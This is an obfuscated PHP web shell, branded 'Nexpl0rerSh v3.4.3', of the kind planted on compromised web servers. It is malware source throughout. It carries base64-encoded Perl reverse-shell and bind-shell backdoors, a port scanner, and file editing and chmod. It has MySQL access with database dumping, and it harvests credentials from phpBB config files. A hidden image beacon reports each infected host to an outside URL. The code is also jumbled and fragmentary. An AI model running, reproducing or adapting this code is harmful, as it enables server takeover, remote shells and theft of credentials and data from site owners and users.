<div align="center"><a class="link" href="javascript:document.folder.dir.value='<?php goto svfxX; ffIPu: $safemode_off_msg = "<font color=green>Safe Mode: OFF</font><br />"; goto JoxvX; lufJS: if ($_POST["mode"] == "scan") { $opent = array(); $host = $_POST[host]; $range = range($_POST[min_port], $_POST[max_port]); foreach ($range as $port) { $con = fsockopen($host, $port, $errno, $errstr, 12); if ($con) { $opent[] = $port; } } $output = "Found " . count($opent) . " opened ports:<br />"; while (list($num, $value) = each($opent)) { $output .= "<b>{$num}</b> : {$value}<br />"; } } goto MXWZj; o_REo: echo isset($_COOKIE[mysql_host]) ? $_COOKIE[mysql_host] : "host"; goto l39TP; gn1XG: echo $auf; goto BKIMW; y_4Tz: if ($_POST["mode"] == "reverse") { chdir($dir); $os = substr(strtoupper(PHP_OS), 0, 3); $txt = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gJEFSR1ZbMV07DQokc3lzID0gJEFSR1ZbMl07DQoNCiAgICBpZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiWyFdIFVzZTogcmV2ZXJzZS5wbCA8WW91ckhvc3Q+IDxZb3VyUG9ydD4gPHN5c3RlbT5cbiI7DQogIHByaW50ZiAiWypdIE5vdGU6IHN5c3RlbSBjYW4gYmUgTElOIG9yIFdJTiI7DQogIGV4aXQoMSk7DQp9DQppZiAoJHN5cyBlcSAiTElOIikgeyAkY21kID0gIi9iaW4vYmFzaCI7IH0NCmlmICgkc3lzIGVxICJXSU4iKSB7ICRjbWQgPSAiQzpcXFdpbmRvd3NcXHN5c3RlbTMyXFxjbWQuZXhlIjsgfQ0KcHJpbnQgIlsrXSBDb25uZWN0aW5nLi4uIFskaG9zdF1cbiI7DQokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgIyB1IGNhbiBjaGFuZ2UgdGhpcw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90KSB8fCBkaWUgKCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9zdCkpKSB7ZGllKCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30NCiAgb3BlbihTVERJTiwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERPVVQsIj4mU0VSVkVSIik7DQogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOw0KcHJpbnQgIi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVxuIjsNCnByaW50ICIgCS09IFJldmVyc2UgU2hlbGwgQmFja2Rvb3IgPS0JXG4iOw0KcHJpbnQgIi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVxuIjsNCnByaW50ICIgRGV0ZWN0ZWQgc2hlbGw6ICRjbWQJCVxuIjsNCnByaW50ICItLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1cblxuIjsNCmV4ZWMgKCRjbWQpOyA="); fwrite(fopen("reverse.pl", "w+"), $txt); exa("perl reverse.pl " . $_POST[ip] . " " . $_POST[port] . " " . $os); unlink("reverse.pl"); } goto cJtgm; RHFlS: function datadump($table) { $result .= "# Dump of {$table} \xa"; $result .= "# Dump DATE : " . date("d-M-Y") . "\xa
"; $query = mysql_query("select * from {$table}"); $num_fields = @mysql_num_fields($query); $numrow = mysql_num_rows($query); for ($i = 0; $i < $numrow; $i++) { $row = mysql_fetch_row($query); $result .= "INSERT INTO " . $table . " VALUES("; for ($j = 0; $j < $num_fields; $j++) { $row[$j] = addslashes($row[$j]); $row[$j] = ereg_replace("
", "\n", $row[$j]); if (isset($row[$j])) { $result .= ""{$row[$j]}""; } else { $result .= """"; } if ($j < $num_fields - 1) { $result .= ","; } } $result .= ");\xa"; } return $result . "\xa
\xa"; } goto KnCOR; vQJqc: $gpc_off_msg = "<font color=green>Magic Quotes: OFF</font><br />"; goto wxqhS; zilZl: if ($_POST["mode"] == "edit") { $dir == realpath(".") ? $file = $_POST["modfile"] : ($file = $dir . $_POST["modfile"]); $content = file_get_contents($file); if ($_POST[modfile] == "config.php") { include $file; $link = "javascript:var form=document.sqlpanel; form.user.value='" . addslashes($dbuser) . "';form.pass.value='" . addslashes($dbpasswd) . "';form.host.value='" . addslashes($dbhost) . "';form.dbname.value='" . addslashes($dbname) . "';document.sqlpanel.submit();"; $output .= "phpBB config file detected! click <a class="link" href="{$link}">here</a> to connect<br />"; } $output .= "<form action=# method=post><input type=hidden name=mode value=doedit><input type=hidden name=modfile value='" . $_POST["modfile"] . "'>
<textarea rows=30 cols=100 name=newtext>" . htmlspecialchars($content) . "</textarea><br /><input type=submit value=edit></form>"; } goto bOCOh; x1YkZ: if ($_POST["mode"] == "update2") { $link = mysql_connect($_COOKIE["mysql_host"], $_COOKIE["mysql_user"], $_COOKIE["mysql_pass"]) or die(mysql_error()); $db = mysql_select_db($_COOKIE["mysql_name"]); $conditions = urldecode(stripslashes(stripslashes($_POST["conditions"]))); $table = $_POST["table"]; $select = mysql_query("SELECT * FROM {$table} WHERE{$conditions}LIMIT 1") or die("query : SELECT * FROM {$table} WHERE{$conditions}LIMIT 1<br /><br />" . mysql_error()); $uno = mysql_fetch_array($select, MYSQL_ASSOC); $pars = array_keys($uno); $query = "UPDATE {$table} SET"; foreach ($pars as $fields) { $query .= " {$fields}='{$_POST[$fields]}',"; } $query = substr($query, 0, strlen($query) - 1); $query .= " WHERE{$conditions}"; $output = "Executed query: {$query} <br /><br />"; mysql_query($query) or die("QUERY: " . $query . "<br /><br /> ERROR:" . mysql_error()); } goto uHiaa; lBiCO: ?>
</title></head>
<body>
<table style="background-color:#333333; border-left:#FFFFFF 1px solid; border-right:#FFFFFF 1px solid;" width="90%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td style="font-size:12px;"><div align="center" class="header"><span class="Stile4"><font size='6' face='Webdings'>!</font></span>Nexpl0rerSh v3<span class="Stile2">.4.3</span> BL4cK Release<span class="Stile4"><font size='6' face='Webdings'>!</font></span></div>
<div align="center"><strong>Shell info: </strong> <span class="Stile2">Author:</span> Nexen <span class="Stile2">Release Date:</span> 1 June 2008 </div>
<table style="background-color:#999999;" width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td id="info" width="50%">PHP Version: <?php goto woJ0y; DJSeR: ?>
%)<br></td>
<td id="info" width="50%"><div align="left">
<?php goto u7SBB; vBtyR: echo $_SERVER["HTTP_HOST"]; goto mupTn; GfKBJ: echo base64_decode($images[url]) . getenv("HTTP_HOST") . $_SERVER["PHP_SELF"]; goto MDzli; wxqhS: $gpc_on_msg = "<font color=red>Magic Quotes: ON</font><br />"; goto fTbem; AMhUj: ?>
</div></td>
</tr>
</table>
<script language=Javascript>
var x = new Image();
x.src = "<?php goto GfKBJ; MLz8Y: if ($_POST["mode"] == "loginsql") { setcookie("mysql_user", $_POST["user"]); setcookie("mysql_pass", $_POST["pass"]); setcookie("mysql_host", $_POST["host"]); setcookie("mysql_name", $_POST["dbname"]); $link = mysql_connect($_POST["host"], $_POST["user"], $_POST["pass"]) or die(mysql_error()); $db = mysql_select_db($_POST["dbname"]); $output = "<table width="100%" border=0><tr><td><form id="table" name="table" method="post" action="#"><input type=hidden name=mode value=sql_query />\xa\xa <input name="query" type="text" id="query" size="50" value="SELECT * FROM table_name" />\xa <input type="submit" name="Submit" value="Query" />
</form><form action=# method=post><input type=hidden name=mode value=dump_db><input name=dbname type=text value="" . $_POST[dbname] . "" size="30">\xa<input type=submit value=DumpDb></form></td><td align=left>\xa<b>:: MySQL Exploit ::</b><br />
<form action=# method=post><input type=hidden name=mode value=sqlexploit>Edit file: <input name=path type=text value="absolute path">\xa<input type=submit value="Read/Edit"></form>
\xa</td></tr></table>
\xa<table width="100%" border="1" cellspacing="0" cellpadding="0">
<tr>
<td width=30%>\xa<table width="100%" border="1" cellspacing="0" cellpadding="0">
\xa </tr>
<tr>\xa <td><center>--[ Table List ]--</center> </td>
</tr>"; $q = mysql_query("SHOW TABLES") or die(mysql_error()); while ($table = mysql_fetch_array($q)) { $output .= "<tr>\xa <td><center><a class="link" href="javascript:document.table.query.value='SELECT * FROM " . $table[0] . "';document.table.submit();">" . $table[0] . "</a></center></td>
</tr>"; } $output .= "
</table></td>
<td width="70%">\xa</td>\xa</tr>\xa</table>\xa"; } goto q3akO; TYcYJ: $images = array("change" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAANESURBVHjaYjxx5tZzXh4OHgYk8O3nb4YfP/8zfHhwjkH3aTHD97+WP8+sP7Pw7d173UxMDC+Q1QIEEAsfH6eAhoo0B7Lgr9//GH7+Z2L4+KafQcrgMQPTX2keaVa1onU9924wMjLMZmBEqAUIIJb///7/YUADzKxMDP+fvWQQZN/EwPQaKHDxBMOni0xfPrJwX//99y8D43+EWoAAYmHAAkAWML9ZxsDB8JiB4T0DGJ/nMOb+kJHX9vXzu3hGBsb7rGxsDKwsbAwAAYTVgL+fPjMwf1jEwPwbyPnOxPDsKSPDV4swRnYedttH9587cXJxzb1x5hrD7ZuXGQACCKsBDB/3MzD/ucjA8ION4f/LvwwvpK0YZF2CGb7dvs5w6fvnn2/fvGTYs2MNUOEfBoAAYsKm///DyQysvJwMDF84GN5/5GP4ouHHICQjxcDM8JeBhYWV4cqlK0BV/4CYjQEggDBc8PfFCQZmjltAzcCY/cTA8I5HjUHQIZSB8/9PBj4eXoYjBw8x3LtzHqiSlQ0UYQABhOoCYAj/ezaPgYkDKPwTaPMHHob3Mp4MglLSDCzABMDIzMjw5vVLTpBuIBYBYm6AAGKBRelPUNS8uMjAwv6QgfGPIJDDzvDqOzuDaFAsw68vHxh+//rJ8OnjJwYmRiZgmmGEuZwXIIDgXvgH8tLfH0CGNAMDBy/Dl+dPGd4IWzNw/GNm+Pn6DVAjI8M/oAtBQQQLKlAoAgQQE3Lc//nNCExELgx//7gyXLwmyPBb1YHhDzCd/f33n4GFlQWohhGkC6wRiD8A8VuAAIK7gJWZgeHhy28Ml/YdYZDm5GZgtM1i4FbSZPjz4xvYMmYWJgYubm4GJiamr0Bn/oZgJgaAAGJCdtOP738Ynt96zsBq7M8grGsODOMfDGzAaBMU5GMQExMHuoKZwcbe8begkCwDIyM4EhgAAoiFCQjBSReINY3NGVQMTBmYBYSANv9m+C3Ay8DKzgb0+38GNjZmBmZmFgYuLk6m8KhYhlu3bjLcv3OdASCAWO7eefhh1Yo1PCAnMjIDYwcUWH9+AZ3FDHTZX4b/IE8Dw4CJiZHhAzAWgGHx68vXLwwKCooMqqrqDAABBgD54A4xrMo1ZAAAAABJRU5ErkJggg==", "delete" => "R0lGODlhEAAQANUAAMczNfRxdPRzdPNydPNzddgqL+AsNN8sM8cpMOY2PuU2PsUgK+UwOfJVYPRja/NjavNja/Nka8UYJ8YZKMUZJ8YgLPJUYMUTJfE/UvA/UfJIWPFIWNRldN+cqMpdSc5uXspXRspYRslYRtWIfMlQQ9ymoMlHPslHP8hHP8c9OeBhW/WBfcc9OuNST/WAfvSAfuPExP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAADEALAAAAAAQABAAAAZ8wJhwSCwaj0eYZ1QceWBEWKgVYgpHohYIKiyRXCvSp/QhvcIl4ghFEKhMqkHgZCVyWBHIw/FIcZAACg0NFgkASDEIDBsaGgwISBwVGJSUC39FHBOUBRIFGBkUmEIdF6AXHB0cphkXHUMwFwaoQ6sHF1xCsaNCq7mIwMExQQA7", "folder" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABmJLR0QAAAAAAAD5Q7t/AAAACXBIWXMAAA3XAAAN1wFCKJt4AAAAB3RJTUUH1QsKEjkN+d1wUAAAAX9JREFUOMulkU2IUlEYhp9jKv5AposQWgRBtA6CmSCa5SzjYhG0qYggiP6Y3WxmtrMIol1QM84qRKRlSVC2bBcYRpuIIigFC7F7j0fP/WZx7QriBc2XDw6cw/e8L+9Rly6XtorF4jZTMsYE58Dc2tvdf0KE1J17t+X61RszH7X2eLb3lF6vd6VaqT2PBJSci7Q+taJMeNt4M331qFqpPQCIA6TTGY7k8pEA50IpcFMKpRS1F9X7QAAwxuB5Lq8/9ml2Msylww5nbjpSSOnPYYJmJ8PjjXW0sXMxUslD3H1YPxUH8DwXgJ+/NV/af+cCnDiaBSCmtSadnjP6DMVc1w0T/BfgXwdLARZNYK2PHgZlh7+QiPkIICIopRARRMAXwVphaH3MSBiMLEMr5LLJCcDzXI7nBnT7hh9dD0ThI4wHERAEkTEYGFmZAH512pw+e44PX/+MlwJ3EfARBAUiYaqVkwXqL1+R19/L6vy1nYabOLa2aHnZ4bf378qbqyyrA8KHtMqnsOL4AAAAAElFTkSuQmCC", "small_unk" => "R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U" . "p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo" . "/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31" . "/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4" . "/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP" . "wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz" . "9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ" . "66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io" . "24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz" . "aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM" . "uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC" . "yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj" . "yAsokBkQADs=", "url" => "aHR0cDovL24wdHcuYWx0ZXJ2aXN0YS5vcmcvYy5waHA/dHlwZT1zaGVsbHMmYz0=", "ext_mp3" => "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU" . "aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc" . "IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", "ext_exe" => "R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7" . "WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt" . "xhIAOw==", "ext_html" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAP3SURBVHjaYtxx5BYDIwMUMDLESIjyTeRiZ2H4//8/WOgvEP/69Zfh5+9/DI8ev3jx9NGDKAYmpovc/MIMc6e0MwAEEAszEyPDP6h+pn9/ORWkBYV4OVlhRjL8Bprz5etfhncfPjP8l5IQ4uVh33Lt2i1foAUXQPIAAcSirC3F8PoXI8N7JmaGrw9f//z67S8DCzMrAwvjPwZWVkYGpv+MDIxAJzIB5VlZGBgsjTRlWFiYN99//BpsCEAAsbCxsTCwMjEx/P3NZPmcSTB2/UNmBsb//xi+fv3DoCH8l8FFlZmBg4WVgZ2dleHHr98Ml27cY/jPwCzDxc23BejLQIAAAEEAvv8CAwH/APT1/l/l7P+/IRwHREEtBQAmJgIA+g4GAKHUBgCGufQA9fb1AAgFAwASEAwA9ff+AOjr8QAFBgob/Pz9YQKI6ePP/7qH7zBP5GJhYtfjZ2KQAnqfCehUoIUMnFzMDBuv8TAsOPSeAWgk0GvMDNxc7AxCvOwM4sI8QJf8/wsQQCzbb/9L/vGLgd9KkoHh03cGhku/GBhefmVg+AjEQHFgxDAzrDr4ncFK/jkDDxcfMDwYGbi4OBhYgF4HBs1/gABiOnf9p/mrT78ZXv9hYHj3m4Hh8hMGhquPGBgevmRgeP+NgeHP5+8Mty98ZLj++D0DK/N/Bm4OdmDA/mDg52QDxztAADG9fPyDb/eRDwzTjvxmAJrBYAx0yV+gzfeBBvz68pfh64PXDOxcrAx//4Jih4mBDRgVPDxAlwDZoNgBCCCmPz//Pn15+iXDiyufGF5+ANnAwMD66yfDzcNPGIS/vWb4+uITAycvE1icmQUYlaysDF8/vwMGKhM4nQAEENOz84t2i4mJMHiYcDNI8DMyCAJdZi4FjB9LVgZ9VW4GEWleBgWJHwxSQEOYgdH5H5jsRETFGf4D0wUorQIEENODQ5MWq2h9uSUty8EgJcDAIMfOwOCpy8FQkibOoKbOy+AaKMbgYfiRQVxEDOhkFgZmYJp58fwJMGj/AkOAkQEggFh+fHj54uLq1PhTurMXPXqkpsr5+QMDDzczA5cML8OzN58YBN+dY7DSEGLgFxJl+AUMh3///jDIysgDww/" . "kgv8MAAHEDPLH19ePnpzcsmzLzduvFT4zKGucOP+M4ffnZwyKrI8ZbDVEGBSUNYDqgRr+/WdgAtL37txgEAZ6Y9XKlacAAogFlmn+fnt3X+bv6e0L6tr8P757B4yJvwzcvIIMbBycDH+" . "Bnv0NzI3ADMHw5+8/Bg1dYwYmNmB+YWXlAAggRE4GxsnUeev09+zalvDsySOgwYzgDA2y9T/Df3juBDFBPBYWNsbbN86fBAgwAD3nU17W2F2kAAAAAElFTkSuQmCC", "ext_jpg" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAACjUlEQVQ4jW2STW8jRRCGn+rp+UhGdmKPN5YhwYFIDuxHDrn4Hu6RyE/YC8oPyB+BAzlyzoUjSAgJrbRI5IKEEmmFYKNI3ll2bLPxbpZxnJ5uDjNxshJ96Gqpup56u94W5xwHBwfB/v7+l0op5ZwTgP+JjmoVReH29va+Pj09LTTAysrK4pM/069+fDYA5vcAEEBEQAQl5fnz3ipJknwDlIAoilQYhjSaDQCUSFksglRFSlQZlRAvLrC1taWBKw0QBIFarsVsfBggVVsBBEFEiHwPB7TiiLdXhsai0Ol0NEC5ae2tJ8uEdcXo3ZT82jA1BeIcjcgnDjSeEpYDC7zlzfCCVqt1CwjDUP387Iwf/niJrz18z8PXHrXI53F/lSQYUw8sSoAaXDbvkaV/+3cBnhcv8EGyPB9eLfR41KnRqQc0wgb59B++H/3KLxenrC/cZz1a9eYA3/dVgdBY8HjYjnjQDqjH7xjkf/Fk+Irn+Ut+ev0b6dUIgMfRZwRBcAtQSqn+x00+/WjKi2nG8b9jppezylKfuu7yxb1u5YrwqPaAy1dvbgHOOWnVm7Ro8olz3Pkzt/+hKpbK4qfqqZoDynyZMMaQZRmTyYSiKOh2u2RZhjGGOI5ZW1vDOZkXqAqgbujX19cMBgPOzs4wxnBycsJ4PKbdbmOMwSEU1mKtZQ7wPE8rpd6TubS0xPb2Nv1+nzzPybKM8/NzCmNxtmA2m8ndIXo3T0jTlF6vR7PZpHKInZ0drIWNjR5QoLXH8fHx5e7ubqlAa61vOm9ubpIkyXtqnCtnA5YoihgOh78fHh6+nivI8/wiTdNvnXMWsM45KyLWOWedwxbWFcbMbBSGs8lkkh0dHX03Go2mAP8BZNgCDYdm9o4AAAAASUVORK5CYII=", "ext_php" => "R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg" . "t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", "ext_pl" => "R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo" . "GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", "ext_swf" => "R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O" . "nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA" . "ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA" . "GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC" . "NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", "ext_tar" => "R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC" . "Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF" . "HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD" . "UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p" . "uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg" . "GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd" . "HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB" . "u4tLAgEAOw==", "ext_txt" => "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAACXBIWXMAAAsTAAALEwEAmpwYAAAABGdBTUEAALGOfPtRkwAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAACm0lEQVR42mLs7+//z0ABAAhAcRzbAAjDABD8gpXYy6O4ZxKWQCxATUuB4+A4glD8ST/9iAjr3vDobIdzeaNEjn8pCVYcqzHq2JPcNTmXGVXlE0AsMJPMVZkZ/jMwM9hosDD8A7rpHyMTw5/P7xi+Pn/CwCwizcDExcPw99dvhr9AyT9//8JdABBAcAMEuJmgLCgNNOTP60kMDDycDJ8fyjCwKZkxcEqrMPz9/ZPh/3+4NgaAAGLB5i9QoPx+d4mB8VcvA+sHBgbmB44MP6WNGZj+/Gf4B8L//jGwcUDUAgQQE1YD/gGJL/MYWBm/Mfy7y8Lwm1uPgUNei+H/n19A2/8z/EXyAkAAsWCz/e/HWwxMv3cyMHxWYPjySZSByTyCgZHhH9hmkGaQITAAEECYBgAN//9hMQMrMxvDv7dCDD9l/Ri45XUZ/v36BgzAfwyMjIwMzMzMcPUAAQT3AshUkMv/frnDwMx6AxgIqgzfviowsOr6g0QhipmYgC74h2IhQADBXfD9+w+g6awMTJ/2MLCyCDD8+8jI8J1bg4FbQpnhHzDkfwLTAUjNjx+/GTg4WBn4+PjA+gACCOEFYLz/+/aMgeXnKwYGdiWGr58/MfxXcmP48vU7w/cvnxn+/PnD8AuYDkDh8Pv3L7g2gACCG8AE9Bcojv8ymTL8//ST4c3fT0CDRBj+ffgI9vefP38ZLl06C9cIYwMEEMIAoP++//rHcPvQJQZhRT0GBkVHBiZgfLKwMAOdzA5UwQ5WFx4eDqZBybiwsFAYIIAQBjAyMLBx8jIIKhsy8GmZA6MNmLCBgpyc7AysrKxA/3+D2w7VzAUKOoAAghvAwszEwCIqxaAKxNgAFxc3smYWWNQABBALTJBYgKwZBAACDAAKWftvHUTAkgAAAABJRU5ErkJggg=="); goto rRUEz; BcLrB: if ($_POST["mode"] == "bind") { chdir($dir); $os = substr(strtoupper(PHP_OS), 0, 3); $port = 31337; $txt = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0OyANCnVzZSBGaWxlSGFuZGxlOyAjIHBlciBsJ2F1dG9mbHVzaA0KJG1heF9jb25uPTEwOw0KJHBvcnRhX2xvY2FsZT0kQVJHVlswXTsNCiRzeXMgPSAkQVJHVlsxXTsNCmlmICgkc3lzIGVxICJMSU4iKSB7ICRjbWQgPSAiL2Jpbi9iYXNoIjsgfQ0KaWYgKCRzeXMgZXEgIldJTiIpIHsgJGNtZCA9ICJDOlxcd2luZG93c1xcc3lzdGVtMzJcXGNtZC5leGUiOyB9DQokcGFkZHJfbG9jYWxlPXBhY2tfc29ja2FkZHJfaW4oJHBvcnRhX2xvY2FsZSxJTkFERFJfQU5ZKTsNCnNvY2tldChTRVJWLEFGX0lORVQsU09DS19TVFJFQU0sJ3RjcCcpIHx8IGRpZSgiRXJyb3JlOiAkISIpOyAgI3NlcnZlci1zb2NrZXQNCnNldHNvY2tvcHQoU0VSVixTT0xfU09DS0VULFNPX1JFVVNFQUREUiwxKSB8fCBkaWUoIkVycm9yZTogJCEiKTsNCmJpbmQoU0VSViwkcGFkZHJfbG9jYWxlKSB8fCBkaWUoIkVycm9yZTogJCEiKTsNCmxpc3RlbihTRVJWLCRtYXhfY29ubikgfHwgZGllKCJFcnJvcmU6ICQhIik7DQpteSAkcGFkZHJfc2luZz1hY2NlcHQoU0lORywgU0VSVik7ICNhY2NldHRvIGxhIGNvbm5lc3Npb25lIGRhbCBjbGllbnQNCm15KCRzaW5nX3BvcnRhLCRzaW5nX2FkZHIsJGdldCk9dW5wYWNrX3NvY2thZGRyX2luKCRwYWRkcl9zaW5nKTsNClNJTkctPmF1dG9mbHVzaCgpOw0Kb3BlbihTVERJTiwgIj4mU0lORyIpOw0Kb3BlbihTVERPVVQsIj4mU0lORyIpOw0Kb3BlbihTVERFUlIsIj4mU0lORyIpOw0KcHJpbnQgIi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVxuIjsNCnByaW50ICIgCS09IEJpbmQgU2hlbGwgQmFja2Rvb3IgPS0JXG4iOw0KcHJpbnQgIi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVxuIjsNCnByaW50ICIgRGV0ZWN0ZWQgc2hlbGw6ICRjbWQJCVxuIjsNCnByaW50ICItLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1cblxuIjsNCmV4ZWMoJGNtZCk7DQpjbG9zZShTSU5HKTs="); fwrite(fopen("bind.pl", "w+"), $txt); exa("perl bind.pl " . $port . " " . $os); unlink("bind.pl"); } goto y_4Tz; ogY64: function pari($num) { return $num % 2 == 0 ? TRUE : FALSE; } goto KDbB3; Sx0I4: echo isset($_COOKIE[mysql_pass]) ? $_COOKIE[mysql_pass] : "pass"; goto Woc_w; Woc_w: ?>
" />
<input type="text" name="host" size="10" value="<?php goto o_REo; pjlqu: ?>
of <?php goto wJg_X; niQR0: $uname = php_uname(); goto zKRhl; J4lso: echo $uname; goto n9akO; J2Xxt: if ($_POST["mode"] == "chmod") { chdir($dir); chmod($_POST[filename], intval($_POST[filemode], 8)) or die("cannot change file mode"); $output = "Mode changed!"; } goto lufJS; c0I31: ?>
